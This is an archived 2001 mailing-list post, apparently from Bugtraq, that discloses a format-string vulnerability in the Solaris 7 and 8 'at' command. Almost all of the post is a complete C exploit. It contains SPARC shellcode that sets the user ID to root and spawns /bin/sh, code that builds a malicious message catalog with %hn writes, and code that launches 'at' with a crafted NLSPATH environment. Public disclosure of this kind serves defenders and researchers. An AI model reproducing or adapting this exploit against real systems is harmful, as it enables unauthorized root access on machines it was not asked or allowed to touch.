Re: "at" is vulnerable on Solaris 7 and 8

• Previous message: Noir Desir: "Solaris 8 libsldap exploit"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi all, 

I am sorry for loosely checking
In fact, Sun has the patch before I found this....:p

Here is the exploit...
--
Huang-Yu Wang
hankat_private

--

/*
  NLSPATH, gettext() vulnerable on Solaris/SPARC 7, 8
  by Hank Wang <hankat_private>

  1. use dump mode to dump memory
  2. alignment of shellcode and command arguments
  3. get the address of shellcode and stack skip
  4. return address location is top address - 0x10
  5. run exploit mode with parameters
*/
#include <stdio.h>
#define SHADDR 0xFFBEFF6C
#define RETLOC 0xFFBEF5BC
#define SKIP 607
#define NOP "\x92\x12\x40\x09"

unsigned long shellcode[]= {
        // setuid 0
        0x901a4009,     // xor %o1, %o1, %o0
        0x82102017,     // mov 0x17, %g1
        0x91d02008,     // ta 8
        // dup2
        0x90102002,     // mov 2,%o0
        0x94102001,     // mov 1,%o2
        0x92102009,     // mov 9,%o1
        0x8210203e,     // mov 0x3e,%g1
        0x91d02008,     // ta 8
        // execve /bin/sh
        0x9422800a,     // sub  %o2, %o2, %o2
        0x9023a008,     // sub  %sp, 8, %o0
        0x210bd89a,     // sethi  %hi(0x2f626800), %l0
        0xa014216e,     // or  %l0, 0x16e, %l0
        0xe023bff8,     // st  %l0, [ %sp + -8 ]
        0x210bdcda,     // sethi  %hi(0x2f736800), %l0
        0xe023bffc,     // st  %l0, [ %sp + -4 ]
        0x9223a010,     // sub  %sp, 0x10, %o1
        0xd023bff0,     // st  %o0, [ %sp + -16 ]
        0xc023bff4,     // clr  [ %sp + -12 ]
        0x8210203b,     // mov  0x3b, %g1
        0x91d02008,     // ta  8
        0x00000000
};

int dump=0, exploit=0;
int shpad=0, argpad=2, skip=SKIP;
unsigned long shaddr=SHADDR, retloc=RETLOC;

void usage(char *prog)
{
  printf("%s [dump|exploit] [parameters]\n", prog);
  printf("parameters:\n");
  printf("\t--skip=<skip stack>\n");
  printf("\t--argpad=<num>: alignment of command args\n");
  printf("\t--shpad=<num>: alignment of shellcode\n");
  printf("\t--shaddr=<shellcode addr>\n");
  printf("\t--retloc=<return address location>\n");
  exit(0);
}

int mygetopt(int argc, char **argv)
{
  int i;

  if(!strncmp(argv[1], "dump", 4)) {
    dump=1;
  }
  else if (!strncmp(argv[1], "exploit", 4)) {
    exploit=1;
  }
  else {
    return -1;
  }

    for(i=2; i<argc; i++) {
      if (!strncmp(argv[i], "--skip=", 7)) {
        skip=atoi(argv[i]+7);
      }
      else if (!strncmp(argv[i], "--shpad=", 8)) {
        shpad=atoi(argv[i]+8)%4;
      }
      else if (!strncmp(argv[i], "--argpad=", 9)) {
        argpad=atoi(argv[i]+9)%4;
      }
      else if (!strncmp(argv[i], "--shaddr=", 9)) {
        shaddr=strtoul(argv[i]+9, 0, 16);
      }
      else if (!strncmp(argv[i], "--retloc=", 9)) {
        retloc=strtoul(argv[i]+9, 0, 16);
      }
      else {
       return -1; 
      }
    }
  return 1;
}

void makemo()
{
  char msg[4096], pattern[16];
  FILE *fp;
  int i, j, r, q;
  unsigned long hw;
  int first, next, last;
  
  r=skip%8;
  r=r?r:8;
  q=skip/8;
  q=(r==8)?q-1:q;

  memset(msg, 0x00, 4096);

  strcpy(msg, "msgstr ");
  if (exploit) {
    hw=(shaddr & 0x0000ffff);
    first=(hw/skip);
    next=hw-(first*(skip-1));
    last=((shaddr & 0xffff0000) >> 16) - hw;
    sprintf(pattern, "%%0%dx", first);
    for(i=0; i<q; i++) {
      strcat(msg, "\"");
      for(j=0; j<8; j++) {
        strcat(msg, pattern);
      }
      strcat(msg, "\"\n");
    }
    strcat(msg, "\"");
    for(j=0; j<r-1; j++) {
      strcat(msg, pattern);
    }
    sprintf(pattern, "%%0%dx", next);
    strcat(msg, pattern);
    strcat(msg, "\"\n");

    strcat(msg, "\"");
    strcat(msg, "%hn");
    sprintf(pattern, "%%0%dx", last);
    strcat(msg, pattern);
    strcat(msg, "%hn");
    strcat(msg, "\"\n");
  }
  else {
    for(i=0; i<q; i++) 
      strcat(msg, "\"%08x %08x %08x %08x %08x %08x %08x %08x\\n\"\n");
    strcat(msg, "\"");
    for(i=0; i<r-1; i++)
      strcat(msg, "%08x ");
    strcat(msg, "%08x");
    strcat(msg, "\\n\"\n");
  }

  fp=fopen("foo.po", "w");

  fprintf(fp, "%s\n", "msgid \"commands will be executed using %s\\n\"");
  fprintf(fp, "%s", msg);
  fclose(fp);

  system("msgfmt -o SUNW_OST_OSCMD foo.po");
}

int makefile(char *file)
{
  unsigned long high, low;
  char *p;
  char cmd[64];
  
  high=retloc+2;  
  low=retloc;

  strncat(file, "AAAA", argpad); 
  p=(char *)&high;
  strncat(file, p, 4);
  strcat(file, "AAAA");
  p=(char *)&low;
  strncat(file, p, 4);
  strncat(file, "AAAA", 4-argpad);
  strcpy(cmd, "touch ");
  strcat(cmd, file);
  system(cmd);
}

int main(int argc, char *argv[])
{
  char *prog;
  char file[20];
  char eggshell[128];
  char nlspath[]="NLSPATH=:.";
  int i;
  char *p=(char *)&shellcode;
  char *env[3]={eggshell, nlspath, NULL};

  prog=argv[0];
  if(argc < 2) {
    usage(prog);
  }
  if (mygetopt(argc, argv)==-1) {
    usage(prog);
  }
  printf("skip=%d, shaddr=0x%08x, retloc=0x%08x\n", skip, shaddr, retloc);
  fflush(stdout);

  makemo();
  memset(file, 0x00, 20);
  makefile(file);

  memset(eggshell, 0x00, 128);
  strcpy(eggshell, "EGGSHELL=");
  strncat(eggshell, "AAAA", shpad);
  for(i=0; i<4; i++)
    strcat(eggshell, NOP);
  strcat(eggshell, p);
  strncat(eggshell, "AAAA", 4-shpad);


  execle("/usr/bin/at", "at", "-f", file, "-t", "07010100", NULL, env);
}

• Next message: Raptor: "Re: [BUGTRAQ] php breaks safe mode"
• Previous message: Noir Desir: "Solaris 8 libsldap exploit"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Jul 05 2001 - 11:14:42 PDT